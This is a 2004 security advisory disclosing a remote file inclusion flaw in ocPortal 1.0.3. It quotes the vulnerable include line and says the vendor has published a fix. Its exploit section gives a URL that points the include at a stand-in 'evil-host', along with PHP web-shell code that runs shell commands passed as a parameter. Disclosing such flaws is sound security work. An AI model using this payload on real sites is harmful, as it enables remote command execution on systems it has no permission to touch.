http://www.hackgen.org/advisories/hackgen-2004-002.txt

''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'                          [hackgen-2004-#002]                       '
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'          Remote file inclusion bug in ocPortal 1.0.3.              '
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
  
  Software: ocPortal <= 1.0.3
  Homepage: http://ocportal.com
  Author: "Exoduks" - HackGen Team
  Release Date: 11 October, 2004
  Website: www.hackgen.org
  Mail: exoduks [at] gmail . com
  
 

 0x01 - Affected software description:
 -------------------------------------
 ocPortal is the leader in community CMS and portal software for the web. 
 It allows you to create and configure your own website within minutes. 
 It's packed full of innovative features that you will not find in competing 
 software (such as support for multi-site networks, or flexible page view 
 permissions), taking a completely different approach to the mainstream 
 competition. ocPortal can seamlessly integrate with most major forum systems, 
 has an innovative point system for your members to enjoy, support for all your 
 content (downloads, banners, galleries, and more), the ability to add new pages 
 as easily as writing a text file, and produces robust and standard compliant 
 pages. No other CMS package can do all of that.  
                                                   // from ocportal.com



 0x02 - Vulnerability Discription:
 ---------------------------------
 This vulnerability exists in index.php because there isn't a check for 
 path in $req_path variable. So we can change the path to some evil host were
 the funcs.php script is and we can even run some system command with the evil 
 script. I have mentioned that you can run system commands with evil script so
 this is very critical bug. I sugest you that you immediatly get new version 
 of this portal.
 


 0x03 - Vulnerability Code:
 --------------------------
 Vulnerability code is at the beagining of index.php 

 ----- beging the code in index.php -----

  if (!isset($req_path)) $req_path="";
  require_once($req_path."funcs.php");

 ----- end of the code -----



 0x04 - How to fix this bug:
 ---------------------------
 Vendor has already publish new scipt with this fix and you can get new versions 
 of this portal from http://ocportal.com/



 0x05 - Exploit:
 ----------------

 http://localhost/ocp-103/index.php?req_path=http://evil-host/

 On your evil host you must put scipt funcs.php.
 Example of funcs.php if your host doesn't support php.

   <?php 
     $com = $_GET["com"]; 
     system ("$com"); 
   ?>

  Example of funcs.php if your host support php.

   <?php
     echo '<?php $com = $_GET["com"]; system ("$com"); ?>';
   ?>
 
  http://localhost/ocp-103/index.php?req_path=http://evil-host/&com=ls



 0x006 - The End:
 ----------------
 The end of my second advisor. There will be more advisories but i don't know
 when :). Till then you can visit http://forum.hackgen.org.
 Grettzz to: All croatian people expecialy Downbload !



                         ______________________________________
                          Written By Exoduks - www.hackgen.org